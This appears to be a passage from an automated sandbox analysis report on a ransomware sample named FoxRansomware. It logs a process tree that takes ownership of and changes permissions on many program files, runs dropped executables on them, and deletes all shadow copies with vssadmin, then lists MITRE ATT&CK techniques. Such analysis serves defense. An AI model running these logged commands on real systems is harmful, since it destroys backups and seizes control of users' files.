      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
      PID:2708
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
      - Modifies file permissions
      PID:2372
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner
      - Loads dropped DLL
      PID:1608
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner
        - Executes dropped EXE
        PID:3036
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
- Executes dropped EXE
PID:3452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
PID:868 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:3548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵
- Loads dropped DLL
PID:1592 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner3⤵
- Loads dropped DLL
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner4⤵
- Executes dropped EXE
PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:3692 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:3672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵
- Loads dropped DLL
PID:268 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:3244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:4028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
PID:3164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:3268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
PID:616 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
- Loads dropped DLL
PID:3568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:2184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "engphon.env" -nobanner3⤵
- Loads dropped DLL
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "engphon.env" -nobanner4⤵
- Executes dropped EXE
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
- Loads dropped DLL
PID:952 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:3296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵
- Loads dropped DLL
PID:548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner4⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
PID:3432 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:3820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
PID:2788 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵
- Modifies file permissions
PID:3212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
PID:3616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵
- Loads dropped DLL
PID:4020 -
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:2388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵
- Loads dropped DLL
PID:3604 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:876 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵
- Loads dropped DLL
PID:2452 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:2560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:2068 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:2060 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:2388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:3616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:300
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2788
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8CEE9AA9-CDB6-4C68-9D55-C293650D091F} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]1⤵PID:3356
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat"2⤵PID:3480
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3992
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C1⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "forms_super.gif" -nobanner1⤵
- Executes dropped EXE
PID:596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner1⤵
- Executes dropped EXE
PID:1048
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "review_browser.gif" -nobanner1⤵
- Executes dropped EXE
PID:1948
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (2)
Downloads